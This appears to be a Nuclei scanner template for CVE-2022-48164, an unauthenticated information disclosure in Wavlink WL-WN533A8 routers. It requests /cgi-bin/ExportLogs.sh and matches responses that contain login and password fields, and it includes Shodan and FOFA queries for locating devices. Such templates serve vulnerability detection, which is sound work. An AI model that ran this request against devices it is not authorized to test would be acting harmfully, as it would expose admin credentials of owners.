id: CVE-2022-48164 info: name: Wavlink WL-WN533A8 M33A8.V5030.190716 - Information Disclosure author: ritikchaddha severity: high description: | An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN533A8 M33A8.V5030.190716 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials. remediation: | Apply the latest firmware updates from Wavlink or implement network segmentation to restrict access to the device administration interface. impact: | Successful exploitation could lead to sensitive information disclosure. reference: - https://docs.google.com/document/d/1JgqpBYRxyU0WKDSqkvi4Yo0723k7mrIUeuH9i1eEs8U/edit?tab=t.0 - https://nvd.nist.gov/vuln/detail/CVE-2022-48164 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-48164 epss-score: 0.87135 epss-percentile: 0.9946 cpe: cpe:2.3:o:wavlink:wl-wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wavlink product: wl-wn533a8_firmware shodan-query: html:"WN533A8" fofa-query: body="WN533A8" tags: cve,cve2022,wavlink,exposure,wn533a8,vkev,vuln flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" matchers: - type: dsl dsl: - 'contains(body, "WN533A8")' internal: true - method: GET path: - "{{BaseURL}}/cgi-bin/ExportLogs.sh" matchers: - type: dsl dsl: - 'contains_all(body, "Login=", "Password=", "WiFi_", "WAVLINK")' - 'contains(content_type, "application/octet-stream")' - 'status_code == 200' condition: and # digest: 4b0a00483046022100fea562e5d1ca79f8b7925312f777d505710ddb9a9f572703be051ee80d953767022100b71ee8a05a2ba625b1c2add6e8d72e2dcc26584b95122d66c4315b9e9ac30a52:922c64590222798bb761d5b6d8e72950